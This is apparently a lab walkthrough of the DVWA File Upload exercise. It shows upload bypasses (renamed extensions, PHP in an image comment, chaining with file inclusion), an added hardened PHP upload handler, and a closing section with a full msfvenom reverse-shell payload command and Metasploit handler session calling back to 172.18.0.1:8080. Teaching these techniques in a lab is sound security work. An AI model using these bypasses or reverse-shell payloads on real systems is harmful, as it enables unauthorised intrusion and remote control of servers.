I am so excited: today we will be using Grumpy Cat to execute code. The cat is a legend.

Alright, let's start at the beginning. I already covered File Inclusion as a cause of vulnerabilities. Today I will cover File Upload.

Low security

As always, low security basically means no security whatsoever, so let's create a PHP file that we will use for our upload. I will call it hack.php.

<?php echo "Hacked"; ?>

When the code in our script executes it will print “Hacked”. Let's try and upload this PHP file.

Uploaded

The interface quite nicely shows us that the file is located at ../../hackable/uploads/hack.php, so all we need to do is to find a way to execute the file.

In this case we can literally just paste the path into the address bar and request the file http://localhost:32770/vulnerabilities/upload/../../hackable/uploads/hack.php. The code from the script ran on the server and the screen shows us “Hacked”.

Medium security

Let's try and upload the same file again.

upload failed

Sadly it will only accept JPEG and PNG images. So what happens if we just rename the file? Let's rename the file to hack.php.png and try to upload it!

It uploads just fine! Now, let's run the code! The address will be almost the same as before: http://localhost:32770/vulnerabilities/upload/../../hackable/uploads/hack.php.png, but the result is quite different!

Run Failed

It tried to display the image to us, and that is not what we want! Luckily, I think we can use the File Inclusion vulnerability we found earlier to run this code. Let's craft a URL that will work even on the high setting. This will be http://localhost:32770/vulnerabilities/fi/?page=file:///app/hackable/uploads/hack.php.png. Run it and let's see the result:

File Included

That is more like it: the “picture” was included and its contents were executed as PHP code.

High security

Now for the real challenge. None of the previous attacks work at this level; the system will only accept images. But did you know images can have plain text content as well? If you open any image, say of Grumpy Cat, in Gimp (or any other image editor) you can take a look at the image properties. It has a field called Comment and you can add any text you want there, including code.

Gimp

In this case I chose to echo phpinfo(), because if you only echo “Hacked” it will be very hard to find among the rest of the image's raw bytes in the output.

Let's upload this image and then execute it through our file inclusion technique.

Cat Executed

Sure enough, we now have the output from phpinfo() on our screen. This is due to the upload process not stripping out the metadata of the image, and the PHP interpreter trying really hard to find something that it can execute.
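The three bypasses above (a raw .php upload, a renamed hack.php.png, and PHP code hidden in an image comment) all share one root cause: the upload handler trusts the file name and keeps the uploaded bytes as they are. The following is an added example, not DVWA's own code, of an upload handler that closes those gaps: it classifies the file by content, re-encodes the pixels with GD so metadata such as the Comment field is discarded, stores the result under a server-chosen name outside the web root, and serves it back as bytes rather than ever including it. Assumptions not taken from the post: the form field is named `uploaded`, the GD and fileinfo extensions are loaded, and `/var/uploads` exists, is writable by the web server and is not under the document root.

```php
<?php
// Added example (not DVWA's code): hardened image upload and serving.
declare(strict_types=1);

const UPLOAD_DIR = '/var/uploads';      // assumed path, outside the web root
const MAX_BYTES  = 2 * 1024 * 1024;     // 2 MiB, an arbitrary limit for this example

/**
 * Validates and stores one uploaded image. Returns the server-chosen file
 * name, or throws RuntimeException with the reason for rejection.
 */
function storeImageUpload(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('transfer error');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }

    // Low/Medium lesson: classify by content, never by the client-supplied
    // name or Content-Type. "hack.php.png" passes an extension check but is
    // not a decodable image, so it is rejected here.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    switch ($mime) {
        case 'image/png':
            $img = @imagecreatefrompng($file['tmp_name']);
            $ext = 'png';
            break;
        case 'image/jpeg':
            $img = @imagecreatefromjpeg($file['tmp_name']);
            $ext = 'jpg';
            break;
        default:
            throw new RuntimeException("unsupported type: $mime");
    }
    if ($img === false) {
        throw new RuntimeException('image could not be decoded');
    }

    // High lesson: write a fresh file from the decoded pixels. GD emits only
    // what it generates, so text placed in a JPEG COMMENT segment or a PNG
    // text chunk does not survive the round trip.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;  // no user influence on the name
    $dest = UPLOAD_DIR . '/' . $name;
    $ok = ($ext === 'png') ? imagepng($img, $dest, 6) : imagejpeg($img, $dest, 85);
    imagedestroy($img);
    if (!$ok) {
        throw new RuntimeException('could not write re-encoded image');
    }
    chmod($dest, 0644);
    return $name;
}

/** Serves a stored image by name; this is the only path that reads it back. */
function serveImage(string $name): void
{
    // Accept only names this script could have generated: 32 hex chars plus extension.
    if (!preg_match('/^[0-9a-f]{32}\.(png|jpg)$/', $name)) {
        http_response_code(404);
        return;
    }
    $path = UPLOAD_DIR . '/' . $name;
    if (!is_file($path)) {
        http_response_code(404);
        return;
    }
    header('Content-Type: ' . (substr($name, -3) === 'png' ? 'image/png' : 'image/jpeg'));
    header('X-Content-Type-Options: nosniff');
    header('Content-Disposition: inline; filename="' . $name . '"');
    readfile($path);   // streamed as bytes, never include()d or require()d
}

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['uploaded'])) {
    try {
        $stored = storeImageUpload($_FILES['uploaded']);
        echo 'Stored as ' . htmlspecialchars($stored, ENT_QUOTES, 'UTF-8');
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo 'Upload rejected: ' . htmlspecialchars($e->getMessage(), ENT_QUOTES, 'UTF-8');
    }
} elseif (isset($_GET['img'])) {
    serveImage((string) $_GET['img']);
}
```

Two design points are worth noting. The re-encode is what neutralises the Grumpy Cat trick: even if the file inclusion bug from the earlier post is still present, including the stored file now yields only pixel data, because nothing the uploader wrote reaches the output file. Keeping uploads outside the document root (and, as defence in depth, disabling the PHP engine for that directory on the web server, for example with Apache's `php_admin_flag engine off`) means that even a file that slipped through could not be requested by path the way hack.php was in the low-security case.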

Reverse shell

So, let's try and get shell access again based on this technique. We will use the Metasploit Framework that comes with Kali Linux.

The first thing to do is to generate a PHP file that can connect back to our Kali machine from our DVWA instance. Metasploit ships with a tool called msfvenom. It is a payload generator and encoder; you can use it to add payloads to regular programs as well as to a plain old PHP file.

msfvenom --arch php --platform php --payload php/meterpreter/reverse_tcp LHOST=172.18.0.1 LPORT=8080  > exploit.php

The command will create a PHP file (--arch and --platform) containing a reverse_tcp payload, and we pass it the LHOST (local host) and LPORT (local port) of the Kali instance. The output is written to exploit.php. Take a look at the code and see if you can figure out what it will do. I will wait.

The exploit will open a socket connection over which Metasploit can send commands, just as the name advertises. The first thing to do now is to have Metasploit (type msfconsole in a terminal) listen on port 8080 to receive this connection.

msf > use exploit/multi/handler 
msf exploit(handler) > set LHOST 172.18.0.1
LHOST => 172.18.0.1
msf exploit(handler) > set LPORT 8080
LPORT => 8080
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > exploit

[-] Handler failed to bind to 172.18.0.1:8080:-  -
[*] Started reverse TCP handler on 0.0.0.0:8080 
[*] Starting the payload handler...

The exploit/multi/handler module lets us set a payload (reverse_tcp) to be run as a Meterpreter listener. When we upload the exploit code and run it, it will connect back to this payload handler.

Owned

The browser tab will keep “loading” the page, but you now have full access to the machine! That's how easy it is to actually take advantage of such a vulnerability.